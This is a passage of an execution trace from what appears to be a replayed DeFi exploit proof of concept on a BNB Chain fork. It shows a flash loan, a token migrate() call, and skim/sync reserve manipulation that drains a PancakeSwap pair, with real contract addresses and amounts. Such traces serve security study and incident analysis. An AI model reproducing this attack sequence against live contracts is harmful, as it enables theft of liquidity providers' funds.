    │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 125000000000000000000 [1.25e20], : 0)
    │   ├─  storage changes:
    │   │   @ 0xfd00a7397c725890bb770b53eb3abd807f6590769de703aab8c4db97634080ec: 0x0000000000000000000000000000000000000000000000612589c3df07067a42 → 0x000000000000000000000000000000000000000000000067ec42f997c2da7a42
    │   └─ ← [Stop]
    ├─ [98650] 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb::migrate()
    │   ├─ [93758] 0x67d7249D581169516E49a88eEC11370234100fb7::migrate() [delegatecall]
    │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 177389769595601 [1.773e14]
    │   │   ├─ [567] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::isExcludedFromFee(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [21274] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, 161263426905090 [1.612e14])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 3225268538100 [3.225e12])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, value: 161263426905090 [1.612e14])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, value: 115792089237316195423570985008687907853269984665640564039457583846649702734845 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x0000000000000000000000000000000000000000000000000122d2c0e4ac61e0 → 0x0000000000000000000000000000000000000000000000000122d89ec6a4f7c8
    │   │   │   │   @ 0xce4f19a36083186070d62ff6541ab5ac20afe318455fe329c78073dc19769c95: 0x0000000000000000000000000000000000000000000000052c54afe5095e8f2b → 0x0000000000000000000000000000000000000000000000052c5542901aa5332d
    │   │   │   │   @ 0x0c5721b8db9ed51b5c9177db1d78d104e9b344d9db0765a58d46d6a160cb75a3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffff6d54eeb95bfd
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000000a155c6341ad1 → 11
    │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122d2c0e4ac61e0 → 0x0000000000000000000000000000000000000000000000000122d89ec6a4f7c8
    │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000052f372e37f762ce15 → 0x0000000000000000000000000000000000000000000000052f372b4906668321
    │   │   │   └─ ← [Return] true
    │   │   ├─ [35340] 0x169f715CaE1F94C203366a6890053E817C767B7C::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 177389769595601 [1.773e14])
    │   │   │   ├─ emit Transfer(from: 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 177389769595601 [1.773e14])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xce4f19a36083186070d62ff6541ab5ac20afe318455fe329c78073dc19769c95: 0x00000000000000000000000000000000000000000000000000c8890c7b56730c → 0x00000000000000000000000000000000000000000000000000c7e7b6b522583b
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000000000000a155c6341ad1
    │   │   │   └─ ← [Return] true
    │   │   ├─ [19273] 0x169f715CaE1F94C203366a6890053E817C767B7C::transferFrom(0x077D12657826369A01638500229205995F78e206, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 17738976959560 [1.773e13])
    │   │   │   ├─ emit Approval(owner: 0x077D12657826369A01638500229205995F78e206, spender: 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, value: 95465280133301800024 [9.546e19])
    │   │   │   ├─ emit Transfer(from: 0x077D12657826369A01638500229205995F78e206, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 17738976959560 [1.773e13])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb8a259052f5632b7b078ae321f2fc650a2e51e73926d4b154c9d0a98349eafbb: 0x0000000000000000000000000000000000000000000000052cd8de9e3607a8a0 → 0x0000000000000000000000000000000000000000000000052cd8ce7c089c0c58
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000000a155c6341ad1 → 0x0000000000000000000000000000000000000000000000000000b177f39fb719
    │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x000000000000000000000000000000000000000000000000022051bfe432cb0c → 0x0000000000000000000000000000000000000000000000000220419db6c72ec4
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [952] 0x169f715CaE1F94C203366a6890053E817C767B7C::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 195128746555161 [1.951e14]
    ├─ [127281] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(175615871899644 [1.756e14], 0, [0x169f715CaE1F94C203366a6890053E817C767B7C, 0xC632F90affeC7121120275610BF17Df9963F181c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1670859422 [1.67e9])
    │   ├─ [47623] 0x169f715CaE1F94C203366a6890053E817C767B7C::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x559D0deAcAD259d970f65bE611f93fCCD1C44261, 175615871899644 [1.756e14])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xAE85A0d7406e83436A9d0753c8F9Fe1fcbb6FcD8, value: 7024634875984 [7.024e12])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x077D12657826369A01638500229205995F78e206, value: 7024634875984 [7.024e12])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 3512317437992 [3.512e12])
    │   │   ├─ emit Fee(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 17561587189960 [1.756e13])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x559D0deAcAD259d970f65bE611f93fCCD1C44261, value: 175615871899644 [1.756e14])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000000b177f39fb719 → 0x000000000000000000000000000000000000000000000000000001c651cbd655
    │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000220419db6c72ec4 → 0x0000000000000000000000000000000000000000000000000220480143a4ff14
    │   │   │   @ 0xb67e781ce0699bf3d15023f516e44e299b58227f797bc14c180690a2bdd06f46: 0x0000000000000000000000000000000000000000000000000023a94d11b08bc8 → 0x00000000000000000000000000000000000000000000000000244905d359e3c4
    │   │   │   @ 3: 0x0000000000000000000000000000000000000000000000052fc04121ecb74329 → 0x0000000000000000000000000000000000000000000000052fc03df026485b01
    │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x000000000000000000000000000000000000000000000004c3874252203fc7ee → 0x000000000000000000000000000000000000000000000004c38748b5ad1d983e
    │   │   └─ ← [Return] true
    │   ├─ [2585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [2893] 0x559D0deAcAD259d970f65bE611f93fCCD1C44261::getReserves() [staticcall]
    │   │   └─ ← [Return] 10037772659231688 [1.003e16], 4292085622002 [4.292e12], 1670859334 [1.67e9]
    │   ├─ [952] 0x169f715CaE1F94C203366a6890053E817C767B7C::balanceOf(0x559D0deAcAD259d970f65bE611f93fCCD1C44261) [staticcall]
    │   │   └─ ← [Return] 10213388531131332 [1.021e16]
    │   ├─ [63001] 0x559D0deAcAD259d970f65bE611f93fCCD1C44261::swap(0, 73619669176 [7.361e10], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [28152] 0xC632F90affeC7121120275610BF17Df9963F181c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 73619669176 [7.361e10])
    │   │   │   ├─ emit Transfer(from: 0x559D0deAcAD259d970f65bE611f93fCCD1C44261, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 73619669176 [7.361e10])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb67e781ce0699bf3d15023f516e44e299b58227f797bc14c180690a2bdd06f46: 0x000000000000000000000000000000000000000000000000000003e7543d24f2 → 0x000000000000000000000000000000000000000000000000000003d6302a243a
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000000000000011241300b8
    │   │   │   └─ ← [Return] true
    │   │   ├─ [952] 0x169f715CaE1F94C203366a6890053E817C767B7C::balanceOf(0x559D0deAcAD259d970f65bE611f93fCCD1C44261) [staticcall]
    │   │   │   └─ ← [Return] 10213388531131332 [1.021e16]
    │   │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(0x559D0deAcAD259d970f65bE611f93fCCD1C44261) [staticcall]
    │   │   │   └─ ← [Return] 4218465952826 [4.218e12]
    │   │   ├─ emit Sync(reserve0: 10213388531131332 [1.021e16], reserve1: 4218465952826 [4.218e12])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 175615871899644 [1.756e14], amount1In: 0, amount0Out: 0, amount1Out: 73619669176 [7.361e10], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x00000000000000000000000000000000020a148d86dc2bb46d209fb99cefa5e2 → 0x00000000000000000000000000000000020a1e2f87a9aaf3f193a952ef911262
    │   │   │   @ 10: 0x00000000000000000000000000008d3ea73bae8cd37e3f4e930dc0a971b7d367 → 0x00000000000000000000000000008d41cb26a86442aa3daac479c1036714d297
    │   │   │   @ 8: 0x63974a46000000000000000003e7543d24f20000000000000023a94d11b08bc8 → 0x63974a9e000000000000000003d6302a243a00000000000000244905d359e3c4
    │   │   └─ ← [Stop]
    │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 73619669176 [7.361e10]
    │   └─ ← [Stop]
    ├─ [216592] 0x559D0deAcAD259d970f65bE611f93fCCD1C44261::swap(0, 950000000000 [9.5e11], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [3452] 0xC632F90affeC7121120275610BF17Df9963F181c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 950000000000 [9.5e11])
    │   │   ├─ emit Transfer(from: 0x559D0deAcAD259d970f65bE611f93fCCD1C44261, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 950000000000 [9.5e11])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb67e781ce0699bf3d15023f516e44e299b58227f797bc14c180690a2bdd06f46: 0x000000000000000000000000000000000000000000000000000003d6302a243a → 0x000000000000000000000000000000000000000000000000000002f8ffc0883a
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000000011241300b8 → 0x000000000000000000000000000000000000000000000000000000ee547c9cb8
    │   │   └─ ← [Return] true
    │   ├─ [197010] ContractTest::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 950000000000 [9.5e11], 0x00)
    │   │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1023619669176 [1.023e12]
    │   │   ├─ [8252] 0xC632F90affeC7121120275610BF17Df9963F181c::transfer(0x429339fa7A2f2979657B25ed49D64d4b98a2050d, 1023619669176 [1.023e12])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x429339fa7A2f2979657B25ed49D64d4b98a2050d, value: 1023619669176 [1.023e12])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000000000ee547c9cb8 → 0
    │   │   │   │   @ 0xd0bc96a89373c8d4ef86c40f26c2b5e34416bedbdde38e0fb127affdc080b2ff: 0x000000000000000000000000000000000000000000000000000000055465c9e7 → 0x000000000000000000000000000000000000000000000000000000f3a8e2669f
    │   │   │   └─ ← [Return] true
    │   │   ├─ [2893] 0x429339fa7A2f2979657B25ed49D64d4b98a2050d::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 202057153674518 [2.02e14], 22890793447 [2.289e10], 1670479098 [1.67e9]
    │   │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(0x429339fa7A2f2979657B25ed49D64d4b98a2050d) [staticcall]
    │   │   │   └─ ← [Return] 1046510462623 [1.046e12]
    │   │   ├─ [52891] 0x429339fa7A2f2979657B25ed49D64d4b98a2050d::swap(177863969485533 [1.778e14], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [18453] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 177863969485533 [1.778e14])
    │   │   │   │   ├─ emit Transfer(from: 0x429339fa7A2f2979657B25ed49D64d4b98a2050d, to: 0x0000000000000000000000000000000000000000, value: 3557279389710 [3.557e12])
    │   │   │   │   ├─ emit Transfer(from: 0x429339fa7A2f2979657B25ed49D64d4b98a2050d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 177863969485533 [1.778e14])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xd0bc96a89373c8d4ef86c40f26c2b5e34416bedbdde38e0fb127affdc080b2ff: 0x0000000000000000000000000000000000000000000000000000b7c518de7d16 → 0x000000000000000000000000000000000000000000000000000005d3b24711f3
    │   │   │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x0000000000000000000000000000000000000000000000000122d89ec6a4f7c8 → 0x0000000000000000000000000000000000000000000000000122df174364a7e4
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 11 → 0x0000000000000000000000000000000000000000000000000000a1c42eb832e8
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000052f372b4906668321 → 0x0000000000000000000000000000000000000000000000052f37280cc806ab13
    │   │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122d89ec6a4f7c8 → 0x0000000000000000000000000000000000000000000000000122df174364a7e4
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x429339fa7A2f2979657B25ed49D64d4b98a2050d) [staticcall]
    │   │   │   │   └─ ← [Return] 6406787240435 [6.406e12]
    │   │   │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(0x429339fa7A2f2979657B25ed49D64d4b98a2050d) [staticcall]
    │   │   │   │   └─ ← [Return] 1046510462623 [1.046e12]
    │   │   │   ├─ emit Sync(reserve0: 6406787240435 [6.406e12], reserve1: 1046510462623 [1.046e12])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 1023619669176 [1.023e12], amount0Out: 177863969485533 [1.778e14], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 10: 0x000000000000000000000000000af143161a446d8129aa7eb91c32b11005de1f → 0x000000000000000000000000000bb95cb3aeab0ab332e878ee7724e35783024b
    │   │   │   │   @ 9: 0x000000000000000000000000000000003207e04a14445ac45c87b40d5a292a1c → 0x000000000000000000000000000000003232f6694aa1241706f2c88f12e88648
    │   │   │   │   @ 8: 0x63917cfa000000000000000000055465c9e70000000000000000b7c518de7d16 → 0x63974a9e000000000000000000f3a8e2669f000000000000000005d3b24711f3
    │   │   │   └─ ← [Stop]
    │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x429339fa7A2f2979657B25ed49D64d4b98a2050d) [staticcall]
    │   │   │   └─ ← [Return] 6406787240435 [6.406e12]
    │   │   ├─ [11653] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::transfer(0x429339fa7A2f2979657B25ed49D64d4b98a2050d, 64067872404360 [6.406e13])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 1281357448086 [1.281e12])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x429339fa7A2f2979657B25ed49D64d4b98a2050d, value: 64067872404360 [6.406e13])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x0000000000000000000000000000000000000000000000000122df174364a7e4 → 0x0000000000000000000000000000000000000000000000000122e16bf11aaf10
    │   │   │   │   @ 0xd0bc96a89373c8d4ef86c40f26c2b5e34416bedbdde38e0fb127affdc080b2ff: 0x000000000000000000000000000000000000000000000000000005d3b24711f3 → 0x00000000000000000000000000000000000000000000000000004018a90dc57b
    │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122df174364a7e4 → 0x0000000000000000000000000000000000000000000000000122e16bf11aaf10
    │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000052f37280cc806ab13 → 0x0000000000000000000000000000000000000000000000052f3726e2712ba77d
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000000a1c42eb832e8 → 0x000000000000000000000000000000000000000000000000000061ab85aa6d72
    │   │   │   └─ ← [Return] true
    │   │   ├─ [23698] 0x429339fa7A2f2979657B25ed49D64d4b98a2050d::skim(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x429339fa7A2f2979657B25ed49D64d4b98a2050d) [staticcall]
    │   │   │   │   └─ ← [Return] 70474659644795 [7.047e13]
    │   │   │   ├─ [11653] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 64067872404360 [6.406e13])
    │   │   │   │   ├─ emit Transfer(from: 0x429339fa7A2f2979657B25ed49D64d4b98a2050d, to: 0x0000000000000000000000000000000000000000, value: 1281357448086 [1.281e12])
    │   │   │   │   ├─ emit Transfer(from: 0x429339fa7A2f2979657B25ed49D64d4b98a2050d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 64067872404360 [6.406e13])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000052f3726e2712ba77d → 0x0000000000000000000000000000000000000000000000052f3725b81a50a3e7
    │   │   │   │   │   @ 0xd0bc96a89373c8d4ef86c40f26c2b5e34416bedbdde38e0fb127affdc080b2ff: 0x00000000000000000000000000000000000000000000000000004018a90dc57b → 5
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000000061ab85aa6d72 → 0x00000000000000000000000000000000000000000000000000009bf07c7120fa
    │   │   │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x0000000000000000000000000000000000000000000000000122e16bf11aaf10 → 0x0000000000000000000000000000000000000000000000000122e3c09ed0b63c
    │   │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122e16bf11aaf10 → 0x0000000000000000000000000000000000000000000000000122e3c09ed0b63c
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(0x429339fa7A2f2979657B25ed49D64d4b98a2050d) [staticcall]
    │   │   │   │   └─ ← [Return] 1046510462623 [1.046e12]
    │   │   │   ├─ [3452] 0xC632F90affeC7121120275610BF17Df9963F181c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: 0x429339fa7A2f2979657B25ed49D64d4b98a2050d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122e16bf11aaf10 → 0x0000000000000000000000000000000000000000000000000122e3c09ed0b63c
    │   │   │   └─ ← [Stop]
    │   │   ├─ [9038] 0x429339fa7A2f2979657B25ed49D64d4b98a2050d::sync()
    │   │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x429339fa7A2f2979657B25ed49D64d4b98a2050d) [staticcall]
    │   │   │   │   └─ ← [Return] 5
    │   │   │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(0x429339fa7A2f2979657B25ed49D64d4b98a2050d) [staticcall]
    │   │   │   │   └─ ← [Return] 1046510462623 [1.046e12]
    │   │   │   ├─ emit Sync(reserve0: 5, reserve1: 1046510462623 [1.046e12])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x63974a9e000000000000000000f3a8e2669f000000000000000005d3b24711f3 → 0x63974a9e000000000000000000f3a8e2669f0000000000000000000000000005
    │   │   │   └─ ← [Stop]
    │   │   ├─ [62726] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(100000000 [1e8], 0, [0xC2319E87280c64e2557a51Cb324713Dd8d1410a3, 0xC632F90affeC7121120275610BF17Df9963F181c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1670859422 [1.67e9])
    │   │   │   ├─ [14474] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x429339fa7A2f2979657B25ed49D64d4b98a2050d, 100000000 [1e8])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 2000000 [2e6])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x429339fa7A2f2979657B25ed49D64d4b98a2050d, value: 100000000 [1e8])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007912929639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffa0a1eff → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffff4143dff
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000052f3725b81a50a3e7 → 0x0000000000000000000000000000000000000000000000052f3725b81a321f67
    │   │   │   │   │   @ 0xd0bc96a89373c8d4ef86c40f26c2b5e34416bedbdde38e0fb127affdc080b2ff: 5 → 0x0000000000000000000000000000000000000000000000000000000005f5e105
    │   │   │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x0000000000000000000000000000000000000000000000000122e3c09ed0b63c → 0x0000000000000000000000000000000000000000000000000122e3c09f0dbf3c
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000009bf07c7120fa → 0x00000000000000000000000000000000000000000000000000009bf075e2a97a
    │   │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122e3c09ed0b63c → 0x0000000000000000000000000000000000000000000000000122e3c09f0dbf3c
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [893] 0x429339fa7A2f2979657B25ed49D64d4b98a2050d::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 5, 1046510462623 [1.046e12], 1670859422 [1.67e9]
    │   │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x429339fa7A2f2979657B25ed49D64d4b98a2050d) [staticcall]
    │   │   │   │   └─ ← [Return] 100000005 [1e8]
    │   │   │   ├─ [38506] 0x429339fa7A2f2979657B25ed49D64d4b98a2050d::swap(0, 1046510410166 [1.046e12], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [23352] 0xC632F90affeC7121120275610BF17Df9963F181c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1046510410166 [1.046e12])
    │   │   │   │   │   ├─ emit Transfer(from: 0x429339fa7A2f2979657B25ed49D64d4b98a2050d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1046510410166 [1.046e12])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000000000000f3a8e199b6
    │   │   │   │   │   │   @ 0xd0bc96a89373c8d4ef86c40f26c2b5e34416bedbdde38e0fb127affdc080b2ff: 0x000000000000000000000000000000000000000000000000000000f3a8e2669f → 52457
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x429339fa7A2f2979657B25ed49D64d4b98a2050d) [staticcall]
    │   │   │   │   │   └─ ← [Return] 100000005 [1e8]
    │   │   │   │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(0x429339fa7A2f2979657B25ed49D64d4b98a2050d) [staticcall]
    │   │   │   │   │   └─ ← [Return] 52457 [5.245e4]
    │   │   │   │   ├─ emit Sync(reserve0: 100000005 [1e8], reserve1: 52457 [5.245e4])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 100000000 [1e8], amount1In: 0, amount0Out: 0, amount1Out: 1046510410166 [1.046e12], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x63974a9e000000000000000000f3a8e2669f0000000000000000000000000005 → 0x63974a9e000000000000000000000000cce90000000000000000000005f5e105
